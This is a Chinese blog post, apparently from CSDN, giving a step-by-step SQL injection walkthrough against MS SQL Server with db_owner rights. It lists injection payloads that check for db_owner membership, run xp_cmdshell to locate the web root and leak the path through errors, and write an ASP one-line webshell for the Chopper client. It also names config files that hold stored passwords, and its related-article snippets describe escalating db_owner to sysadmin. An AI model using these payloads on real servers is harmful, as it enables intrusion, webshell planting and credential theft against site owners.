sql server dbowner 权限 实战

于 2021-06-28 02:14:03 发布
阅读量1.8k 收藏 2
点赞数 1
分类专栏: 网安工程师面试篇 sql注入 网络安全工程师面试篇 文章标签: sql 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118285326
版权

具有dbowner角色的用户,能够对数据库执行所有配置和维护操作。例如创建和删除表、存储过程、视图、函数,甚至删除数据库,还可以给其他用户设置权限。
只有增、删、改权限的用户只限于添加、删除和修改记录,其它操作都会受到限制。
第一步 查看当前网站是否为db_owner 权限
and 1=(select is_member(‘db_owner’) );-- 判断当前数据库用户是否为db_owner 权限
第二步:找出网站路径
1.通过报错或baidu google 等查找 通过搜索引擎收录报错的页面看看里面有没有网站路径

2.通过相关语句
;drop table black;create TABLE black(result varchar(7996) NULL, ID int NOT NULL IDENTITY(1,1))–
删除 在创建一个表
;insert into black exec master . . xp_cmdshell ‘dir /s c:\1.aspx’–
通过xp_cmdshell扩展存储搜索出路径并插入到创建的表中
and (select result from black where id=1)>0–
然后在通过错误语句爆出插入到字段的路径
常见配置文件下找路径
php.ini 配置信息 php配置信息文件
my.ini mysql配置文件 记录管理员登陆过的mysql用户名和密码
user.MYD 存储mysql.user 表中的数据库链接密码
NETAbase.xml 查看iis虚拟主机配置
http.conf apache 配置文件
sam windows系统初次安装的密码
3 写一句话木马获取webshell
%20;exec%20master…xp_cmdshell%20’Echo%20"<%eval%20request(“chopper”)%>"%20>>%20c:\wwwtest\iis-xxser.com–wwwroot\muma.asp’–
因为刚才得到了网站在服务器中路径所以现在可以通过xp_cmdshell 扩展存储 在这个路径下写进去一句话木马

通过菜刀连接木马
第二种方法
得到网站路径也可以getwebshell 工具 通过差异备份 来插入一句话木马

安全界 的彭于晏
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql db_owner_SQL Server修改数据库对象所有者(Owner)浅析
weixin_33998219的博客
01-30 1420
SQL Server数据库中如何修改数据库对象(表、视图、存储过程..)的所有者(Owner)呢?一般我们可以使用系统提供的系统存储过程sp_changeobjectowner来修改。 我们先看看sp_changeobjectowner在MSDN的文档介绍吧更改当前数据库中对象的所有者。重要提示:此存储过程只针对 Microsoft SQL Server 2000 中可用的对象进行。后续版本的 ...
mongodb基础之用户权限管理实例教程
09-09
3. **数据库管理角色**,如 `dbAdmin`(数据库管理员)、`dbOwner`(拥有所有权限,包括读写、管理及用户管理)和 `userAdmin`(用户管理)。 4. **集群管理角色**,如 `clusterAdmin`(全集群管理权限)。 5. **...
SQL语句赋予sql登陆帐号dbowner权限
huike008的博客
03-29 349
exec sp_addrolemember 'db_owner', 'test_user' dbowner权限 非接触式IC卡简介 解决关机SVCHOST.EXE报错的问题
什么是DBO
weixin_30902251的博客
05-31 387
DBO是每个数据库的默认用户,具有所有者权限,即DbOwner通过用DBO作为所有者来定义对象,能够使数据库中的任何用户引用而不必提供所有者名称。比如:你以User1登录进去并建表Table,而未指定DBO,当用户User2登进去想访问Table时就得知道这个Table是你User1建立的,要写上User1.Table,如果他不知道是你建的,则访问会有问题。如果你建表时把所有者指给了Dbo,则别的...
SQL Server 中为何拥有db_owner权限的账号删除不掉数据库
09-18 851
今天在公司的SQL Server服务器上,使用了一个只有public和dbcreator角色的账号"user1"在SMSS中去删除一个数据库,但是死活报错说没有权限,报错如下: Delete backup history failed for server 'MYSERVER' (Microsoft.SqlServer.Smo) Additional Information: T...
MSSQL 2005中修改用户dbowner权限,提示用户、组或角色'*****'在当前数据库中已存在
dingmao6790229的专栏
06-19 2890
MSSQL 2005中修改用户dbowner权限,提示用户、组或角色'*****'在当前数据库中已存在   为一个数据库添加一个用户时,提示以下信息: 用户、组或角色 '*****' 在当前数据库中已存在。 (Microsoft SQLServer, Error: 15023)   问题分析:在迁移测试平台数据库的过程中发现,在两台服务器上运行的sql server服务器之间迁移数据库的
msSQL注入通杀,只要有注入点就有系统权限
动性忍心
09-18 1377
不知道大家看过这篇文章没有,可以在db_owner角色下添加SYSADMIN帐号,这招真狠啊,存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程,饶过了验证部分。具体方法如下:先输入drop procedure sp_addlogin,然后在IE里面输入create procedure  sp
如何让用户只能访问特定的数据库(MSSQL)
12-14
 为了限定不同厂商的维护人员只能访问自己的数据库,现需要给各个厂商限定权限,让他们登录SQL Server只能看到授权的数据库而无法看到其他数据库。  解决方案  1.先给不同的厂商创建不同的登录名(如下以一个...
MongoDB创建用户并设置权限[借鉴].pdf
10-12
`dbOwner`角色使用户成为该数据库的所有者,具有读写、用户管理等权限。 3. 授予角色: 如果需要修改用户的角色,可以使用`db.grantRolesToUser()`命令,如: ``` db.grantRolesToUser("test", [{ role: ...
Mongodb4.x介绍以及Mongodb账户权限配置1
08-03
db.createUser({user: "eggadmin", pwd: "123456", roles: [ { role: "dbOwner", db: "eggcms" } ]}) ``` 这样,`eggadmin` 用户就只能访问 `eggcms` 数据库,无法访问其他数据库。 三、MongoDB 账户权限配置中...
HPS8安装文档.doc
05-27
而HPSu 8.3 Server for SQL Server的安装则涉及预配置SQL Server环境,包括创建特定的数据库、用户和权限,以及配置ODBC数据源以连接到SQL Server。 总的来说,Hyperion的安装和配置是一项复杂的工作,需要对数据库...
***中遇到MSSQL:db_owner如何处理
weixin_34199405的博客
08-13 121
在我某次的***工作中遇见的一个小问题,其权限设置时非常BT,只能在当前的目录下转悠,调用cmdshell可想而知,一般的尝试方法都将失去效应,但是它的数据库确是MSSQL权限应该不会太高 SrvRoleMember : db_owner 果然,经过查看之后发现时db_owner权限,其实大多数朋友能走到这里说明您还有足够的思路分析能力,那么我们就可以进行我们的...
SQL 数据库所有者 (dbo)与数据库角色 db_owner 区别
iloveyoubaby的专栏
08-29 4773
dbo 是具有在数据库中执行所有活动的暗示性权限的用户。将固定服务器角色 sysadmin 的任何成员都映射到每个数据库内称为 dbo 的一个特殊用户上。另外,由固定服务器角色 sysadmin 的任何成员创建的任何对象都自动属于 dbo。例如,如果用户 Andrew 是固定服务器角色 sysadmin 的成员,并创建表 T1,则表 T1 属于 dbo,并以 dbo.T1 而不是 Andrew
论在mssql中public和db_owner权限下拿到webshell或者系统权限
yynice的程序员、事业、人生、情感专栏
06-21 1422
        在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生
sqlserver中的架构(schema)与所有者(owner)
热门推荐
Hehuyi_In的博客
07-17 1万+
2.6 架构 2.6.1 架构 架构(Schema)是一个命名的数据库对象容器,每个数据库对象(视图、表、函数等)都属于一个架构。 架构将数据库对象分组为单独的命名空间,不同的架构中可以出现重名的对象。因此,访问一个数据库对象时,通常应该是两段式名称:<架构名>.<对象名>。 可以对架构应用安全规则,安全规则将由架构中的所有对象继承。如果设置了对架构的访问权限...
mssql中public和db_owner权限下拿到webshell或者系统权限
CC's Blog
11-07 3375
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确
sqlserver数据库表开头db_owner修改成dbo
Alice_1011的小屋
05-24 1514
sqlserver数据库 建的表以db_owner开头如何修改成以dbo开头的方法: 点击表--设计--视图--属性窗口--架构--可以选择了(dbo/db_owner)
MSSQL db_owner注入获得系统权限
wangmj518的专栏
12-17 731
相信大家都看过LCX大虾写的《MSSQL db_owner角色注入直接获得系统权限》吧,小弟不自量力也写写我利用MSSQL db_owner角色注入直接获得系统权限的方法。LCX大哥大致取得系统权限的思路是利用MSSQL中xp_regread的存储过程读出vnc在注册表中的密码,然后再破解,就可以拿到管理员权限。可是在网上毕竟装vnc的服务器是少数,要是一台你很想进入的服务器不装vnc,也就是说没
(AuthenticationFailed): 'Authentication failed.
最新发布
09-20
Authentication failed是一个常见的错误信息,它表示身份验证失败。根据提供的引文内容,这个错误信息在连接MongoDB数据库时出现。一种解决方案是确保使用正确的授权账号进行连接。正确的做法是使用root账号在将要操作的数据库中创建一个子账号,并使用这个子账号进行连接。你可以按照以下步骤进行操作: 1. 使用root账号登录MongoDB数据库: ``` > use admin > db.auth("root","123456") ``` 2. 切换到将要操作的数据库: ``` > use good ``` 3. 创建一个子账号,并赋予相应的角色权限: ``` > db.createUser({user:"daniel",pwd:"123456",roles:[{role:"dbOwner",db:"good"}]}) ``` 4. 在Java代码中使用正确的账号、密码等进行连接。 请注意,以上步骤中的账号、密码等信息需要根据你的实际情况进行相应的修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值